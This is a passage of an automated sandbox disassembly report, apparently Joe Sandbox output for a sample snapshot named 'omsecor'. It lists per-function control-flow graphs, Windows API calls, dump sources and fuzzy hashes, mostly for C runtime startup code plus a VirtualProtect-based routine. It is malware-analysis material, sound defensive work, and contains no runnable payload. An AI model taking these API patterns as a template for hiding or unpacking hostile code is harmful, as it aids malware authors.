                          control_flow_graph 42 407a59-407a6e 43 407a70-407a78 42->43 44 407adf 42->44 43->44 46 407a7a-407aa8 call 407a98 43->46 45 407ae1-407ae5 44->45 47 407b24 call 407b29 45->47 48 407ae7-407aef GetModuleHandleA 45->48 54 407aaa 46->54 55 407b1e-407b20 46->55 51 407af1-407af9 48->51 51->51 53 407afb-407afe 51->53 53->45 56 407b00-407b02 53->56 57 407aac-407ab0 54->57 58 407b0d-407b10 54->58 59 407b22 55->59 60 407b18-407b1d 55->60 61 407b04-407b06 56->61 62 407b08-407b0c 56->62 65 407b17 57->65 66 407ab2-407abd GetProcAddress 57->66 63 407b11-407b12 GetProcAddress 58->63 59->53 60->55 61->63 62->58 63->65 65->60 66->44 67 407abf-407acc VirtualProtect 66->67 68 407ade 67->68 69 407ace-407adc VirtualProtect 67->69 68->44 69->68
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407A98: GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                            • Part of subcall function 00407A98: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 8932c9a1b40894ead954c0166dfb712feb6fdadac19e13bdf209ed336a7ac0e8
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: DE21F621A4D2416EEB2186B44C0166B7BE49B13368F1946A7D141EB2C3D1BC7D4687AB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 70 407ab5-407abd GetProcAddress 71 407adf 70->71 72 407abf-407acc VirtualProtect 70->72 75 407ae1-407ae5 71->75 73 407ade 72->73 74 407ace-407adc VirtualProtect 72->74 73->71 74->73 76 407b24 call 407b29 75->76 77 407ae7-407aef GetModuleHandleA 75->77 79 407af1-407af9 77->79 79->79 80 407afb-407afe 79->80 80->75 81 407b00-407b02 80->81 82 407b04-407b06 81->82 83 407b08-407b10 81->83 84 407b11-407b17 GetProcAddress 82->84 83->84 87 407b18-407b20 84->87 89 407b22 87->89 89->80
                          APIs
                          • GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 39b30828dda2cca0c429c80848ec8113aa03dbdf6ed959677c669bf53de2d5ad
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 98F0F400E8D2043CEE2151B40C01ABBBBEC86633687241A27A211E72C3D4BC7E0692BB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 93 402f3e-402f5c HeapCreate 94 402f61-402f6e call 402ee3 93->94 95 402f5e-402f60 93->95 98 402f70-402f7d call 405045 94->98 99 402f94-402f97 94->99 98->99 102 402f7f-402f92 HeapDestroy 98->102 102->95
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004017AC,00000001), ref: 00402F4F
                          • HeapDestroy.KERNEL32 ref: 00402F85
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CreateDestroy
                          • String ID:
                          • API String ID: 3296620671-0
                          • Opcode ID: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction ID: 98ebcd61208b82bef51758d9ec37e8992e6abd11400b15b10fa3614edeb5f36b
                          • Opcode Fuzzy Hash: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction Fuzzy Hash: D3E092706643029EEB40AB31AF0D72636E4E74078AF10843BF548F51E2EBBC8605AF4C
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004020B3
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
                          • UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
                          • TerminateProcess.KERNEL32(00000000), ref: 004020F6
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction ID: b20ca496c67c0111f9bdb02fdd2caa8760b953d18a2e8655b2b95bf976f6fc72
                          • Opcode Fuzzy Hash: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction Fuzzy Hash: 5321AEB5950304DFC710EF24EF48A453BB5BF88306F10403AE549B36A1E7B859A59F9E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 103 402465-40246f 104 402471-402478 103->104 105 402480-402483 104->105 106 40247a-40247e 104->106 107 402600-402604 105->107 108 402489-402495 call 404c30 105->108 106->104 106->105 111 40249b-4024a5 call 404c30 108->111 112 4025cc-4025d8 GetStdHandle 108->112 118 4024b4-4024ba 111->118 119 4024a7-4024ae 111->119 114 4025da-4025dd 112->114 115 4025ff 112->115 114->115 117 4025df-4025f9 call 404b40 WriteFile 114->117 115->107 117->115 118->115 122 4024c0-4024db call 404bcb 118->122 119->112 119->118 125 4024ea-402506 GetModuleFileNameA 122->125 126 4024dd-4024e7 call 404121 122->126 128 402508-40251d call 404bcb 125->128 129 40252e-402539 call 404b40 125->129 126->125 128->129 137 40251f-40252b call 404121 128->137 135 402573 129->135 136 40253b-402560 call 404b40 call 404a82 129->136 139 402575-402586 call 404a11 135->139 136->135 151 402562-402571 call 404121 136->151 137->129 146 402595-4025a8 call 404a11 139->146 147 402588-402592 call 404121 139->147 155 4025b7-4025ca call 404854 146->155 156 4025aa-4025b4 call 404121 146->156 147->146 151->139 155->115 156->155
                          APIs
                          • _strcpy_s.LIBCMT ref: 004024D1
                          • __invoke_watson.LIBCMT ref: 004024E2
                          • GetModuleFileNameA.KERNEL32(00000000,0040B091,00000104), ref: 004024FE
                          • _strcpy_s.LIBCMT ref: 00402513
                          • __invoke_watson.LIBCMT ref: 00402526
                          • _strlen.LIBCMT ref: 0040252F
                          • _strlen.LIBCMT ref: 0040253C
                          • __invoke_watson.LIBCMT ref: 00402569
                          • _strcat_s.LIBCMT ref: 0040257C
                          • __invoke_watson.LIBCMT ref: 0040258D
                          • _strcat_s.LIBCMT ref: 0040259E
                          • __invoke_watson.LIBCMT ref: 004025AF
                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77735E70,00000003,00402631,000000FC,0040667C,00000001,00000000,00000000,?,00403FFF,?,00000001), ref: 004025CE
                          • _strlen.LIBCMT ref: 004025EF
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00403FFF,?,00000001,?,00403478,00000018,004093D0,0000000C,00403507,?), ref: 004025F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 1879448924-4022980321
                          • Opcode ID: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction ID: 3ad8829dabe9c8e6b7970468b651ade891dcb41a26c93daa50347fadcc2e15d8
                          • Opcode Fuzzy Hash: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction Fuzzy Hash: CF3127B2A402153AE62136326F5EF2F314C9B91315F14013BFE09B26D6FABD9A1441FE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 162 401e76-401e86 GetModuleHandleA 163 401e91-401ed9 GetProcAddress * 4 162->163 164 401e88-401e90 call 401bca 162->164 166 401ef1-401f10 163->166 167 401edb-401ee2 163->167 170 401f15-401f23 TlsAlloc 166->170 167->166 169 401ee4-401eeb 167->169 169->166 171 401eed-401eef 169->171 172 401ff5 170->172 173 401f29-401f34 TlsSetValue 170->173 171->166 171->170 174 401ff7-401ff9 172->174 173->172 175 401f3a-401f89 call 402419 call 401aaa * 4 call 403378 173->175 188 401ff0 call 401bca 175->188 189 401f8b-401fa6 call 401b21 175->189 188->172 189->188 194 401fa8-401fba call 404032 189->194 194->188 197 401fbc-401fd3 call 401b21 194->197 197->188 201 401fd5-401fee call 401c07 GetCurrentThreadId 197->201 201->174
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004017BE), ref: 00401E7C
                          • __mtterm.LIBCMT ref: 00401E88
                            • Part of subcall function 00401BCA: TlsFree.KERNEL32(00000002,00401FF5), ref: 00401BF5
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004033DC
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00403406
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00401E9E
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00401EAB
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00401EB8
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00401EC5
                          • TlsAlloc.KERNEL32 ref: 00401F15
                          • TlsSetValue.KERNEL32(00000000), ref: 00401F30
                          • __init_pointers.LIBCMT ref: 00401F3A
                          • __calloc_crt.LIBCMT ref: 00401FAF
                          • GetCurrentThreadId.KERNEL32 ref: 00401FDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 2125014093-3819984048
                          • Opcode ID: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction ID: 2b6f412a48510a2ea5e28321b190ff4220801d9e6bfc04da0c4d4af9d52f3434
                          • Opcode Fuzzy Hash: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction Fuzzy Hash: AF318F319483029BE7146F75AF05B063AA5AF40355712053FF861B22F5EF7C8490EB5E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 204 404854-404876 call 401b18 207 40492a-404934 204->207 208 40487c-40488b LoadLibraryA 204->208 211 404936-40493c 207->211 212 4049af-4049b7 207->212 209 404891-4048a1 GetProcAddress 208->209 210 404a0a 208->210 209->210 215 4048a7-4048e9 call 401aaa GetProcAddress call 401aaa GetProcAddress call 401aaa call 4021f2 209->215 216 404a0c-404a10 210->216 211->212 217 40493e-404957 call 401b21 * 2 211->217 213 4049b9-4049c2 call 401b21 212->213 214 4049ea-4049f8 call 401b21 212->214 213->214 227 4049c4-4049cb 213->227 214->210 226 4049fa-404a08 214->226 244 4048f8-4048fc 215->244 245 4048eb-4048f5 call 404121 215->245 217->212 232 404959-40495b 217->232 226->216 227->214 237 4049cd-4049d5 227->237 232->212 236 40495d-404961 232->236 246 404963-404974 236->246 247 40497c-404988 call 402229 236->247 237->214 239 4049d7-4049e0 call 401b21 237->239 239->214 252 4049e2-4049e7 239->252 244->207 250 4048fe-404914 GetProcAddress call 401aaa 244->250 245->244 246->247 258 404976-40497a 246->258 259 404997-40499b 247->259 260 40498a-404994 call 404121 247->260 250->207 264 404916-404925 GetProcAddress call 401aaa 250->264 252->214 258->212 258->247 262 4049a6-4049ad 259->262 263 40499d-4049a4 259->263 260->259 262->214 263->214 264->207
                          APIs
                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00404881
                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040489D
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048BA
                            • Part of subcall function 00401AAA: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                            • Part of subcall function 00401AAA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048CF
                          • __invoke_watson.LIBCMT ref: 004048F0
                            • Part of subcall function 00404121: _memset.LIBCMT ref: 004041AD
                            • Part of subcall function 00404121: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004041CB
                            • Part of subcall function 00404121: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004041D5
                            • Part of subcall function 00404121: UnhandledExceptionFilter.KERNEL32(0040B078,?,?,00000000), ref: 004041DF
                            • Part of subcall function 00404121: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004041FA
                            • Part of subcall function 00404121: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00404201
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401B21: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                            • Part of subcall function 00401B21: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00404904
                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040491C
                          • __invoke_watson.LIBCMT ref: 0040498F
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                          • API String ID: 2940365033-232180764
                          • Opcode ID: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction ID: 59fbdf2cbb2ff75c7ae2a14c3bd4fe5a66861bdf874bec260bfce3d1cd22fe51
                          • Opcode Fuzzy Hash: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction Fuzzy Hash: FD4163F1D00205AEDF10AFB59D86A6F7BA4EB94305B14083FE505F22E0DB7D9944CA5E

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                          • InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                          • __lock.LIBCMT ref: 00401C86
                          • ___addlocaleref.LIBCMT ref: 00401CA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1036688887-2843748187
                          • Opcode ID: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction ID: 560e36331183b230e08dea58ace58335192f7a528c6e8c7e040251058e5fa637
                          • Opcode Fuzzy Hash: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction Fuzzy Hash: 32113D719847019EE7209F76CA45B5ABBE4AF04348F10853FE899B62E1CB7C99418F19

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 287 402c5b-402c82 call 402f98 GetStartupInfoA 290 402c83 call 404032 287->290 291 402c88-402c8c 290->291 292 402e92 291->292 293 402c92-402ca3 291->293 295 402e95-402e9a call 402fdd 292->295 294 402cce-402cd0 293->294 296 402cd2-402cd6 294->296 297 402ca5-402cc8 294->297 299 402dd9 296->299 300 402cdc-402ce1 296->300 297->294 302 402ddb-402deb 299->302 300->299 303 402ce7-402cf9 300->303 304 402df8-402dfe 302->304 305 402ded-402df0 302->305 306 402cfb 303->306 307 402cfd-402d00 303->307 309 402e00-402e03 304->309 310 402e05-402e0c 304->310 305->304 308 402df2-402df6 305->308 306->307 311 402d54-402d5a 307->311 314 402e6a-402e6e 308->314 315 402e0f-402e1b GetStdHandle 309->315 310->315 312 402d02-402d04 311->312 313 402d5c 311->313 316 402d06 call 404032 312->316 317 402d64-402d6a 313->317 314->302 318 402e74-402e82 SetHandleCount 314->318 319 402e60-402e64 315->319 320 402e1d-402e1f 315->320 321 402d0b-402d0f 316->321 317->299 322 402d6c-402d74 317->322 318->295 319->314 320->319 323 402e21-402e2a GetFileType 320->323 324 402d11-402d27 321->324 325 402d5e 321->325 326 402d76-402d79 322->326 327 402dcc-402dd7 322->327 323->319 328 402e2c-402e36 323->328 329 402d4f-402d51 324->329 325->317 326->327 330 402d7b-402d7f 326->330 327->299 327->322 331 402e38-402e3c 328->331 332 402e3e-402e41 328->332 335 402d53 329->335 336 402d29-402d49 329->336 330->327 337 402d81-402d83 330->337 333 402e47-402e4f 331->333 332->333 334 402e43 332->334 338 402e50 call 404763 333->338 334->333 335->311 336->329 339 402d90-402db9 337->339 340 402d85-402d8e GetFileType 337->340 342 402e55-402e59 338->342 341 402dba call 404763 339->341 340->327 340->339 343 402dbf-402dc3 341->343 342->292 344 402e5b-402e5e 342->344 343->292 345 402dc9 343->345 344->314 345->327
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 00402C70
                          • __calloc_crt.LIBCMT ref: 00402C83
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                          • __calloc_crt.LIBCMT ref: 00402D06
                          • GetFileType.KERNEL32(00000038), ref: 00402D86
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402DBA
                          • GetStdHandle.KERNEL32(-000000F6), ref: 00402E10
                          • GetFileType.KERNEL32(00000000), ref: 00402E22
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402E50
                          • SetHandleCount.KERNEL32 ref: 00402E7A
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                          • String ID:
                          • API String ID: 1318386821-0
                          • Opcode ID: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction ID: b2392c38ea11d8206f0d28861f948c6360aed0bed67f1e2b59f3cb23873ff797
                          • Opcode Fuzzy Hash: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction Fuzzy Hash: 366136715447518ED7248B38CB4C7167BA0EF02324F29437BD9A5BB2E1D7B89806CB9D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 346 403bd3-403bfa call 403b59 349 403c0a-403c0d 346->349 350 403bfc-403c05 call 403854 346->350 352 403c0f-403c15 349->352 357 403d9d-403da4 350->357 354 403c1b-403c26 352->354 355 403cac-403cd0 call 405f60 352->355 354->352 358 403c28-403c2e 354->358 365 403cfc-403cff 355->365 359 403da5 call 401662 357->359 361 403c34-403c3a 358->361 362 403d9a 358->362 364 403daa-403dab 359->364 361->362 363 403c40-403c4c IsValidCodePage 361->363 362->357 363->362 366 403c52-403c5f GetCPInfo 363->366 367 403d01-403d11 365->367 368 403cd2-403cd7 365->368 369 403c65-403c83 call 405f60 366->369 370 403d8e-403d94 366->370 367->365 371 403d13-403d32 call 403825 367->371 368->367 372 403cd9-403cdf 368->372 380 403d81 369->380 381 403c89-403c8d 369->381 370->350 370->362 382 403d33-403d3e 371->382 375 403cf3-403cf5 372->375 376 403ce1-403cf2 375->376 377 403cf7-403cfb 375->377 376->375 377->365 383 403d84-403d8c 380->383 384 403d62-403d65 381->384 385 403c93 381->385 382->382 386 403d40-403d47 call 4038a9 382->386 383->386 389 403d6a-403d6f 384->389 387 403c96-403c9a 385->387 396 403d4c-403d51 386->396 387->384 391 403ca0-403ca7 387->391 389->389 390 403d71-403d7f call 403825 389->390 390->383 394 403d52-403d54 391->394 394->396 397 403d56-403d5c 394->397 396->394 397->384 397->387
                          APIs
                          • getSystemCP.LIBCMT ref: 00403BEC
                            • Part of subcall function 00403B59: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00403B66
                            • Part of subcall function 00403B59: GetOEMCP.KERNEL32(00000000,?,00402A85,?,?,00000001), ref: 00403B80
                          • setSBCS.LIBCMT ref: 00403BFE
                            • Part of subcall function 00403854: _memset.LIBCMT ref: 00403867
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00409430), ref: 00403C44
                          • GetCPInfo.KERNEL32(00000000,00403F56), ref: 00403C57
                          • _memset.LIBCMT ref: 00403C6F
                          • setSBUpLow.LIBCMT ref: 00403D42
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                          • String ID:
                          • API String ID: 2658552758-0
                          • Opcode ID: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction ID: 0e9026f4e105130f7015617c44e62dc713e6d3fa9c6682f74f6de7838a23a284
                          • Opcode Fuzzy Hash: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction Fuzzy Hash: 875108319042558BDB159F25C8442BABFB8EF05306F14847FE881FF282C63CCA46DB99

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 398 401aaa-401abb TlsGetValue 399 401abd-401ac5 398->399 400 401ade-401aed GetModuleHandleA 398->400 399->400 401 401ac7-401ad4 TlsGetValue 399->401 402 401b12-401b17 400->402 403 401aef-401af6 call 401a3e 400->403 401->400 408 401ad6-401adc 401->408 403->402 407 401af8-401afe GetProcAddress 403->407 409 401b04-401b06 407->409 408->409 409->402 410 401b08-401b0e 409->410 410->402
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                          • TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          Strings
                          Memory Dump Source
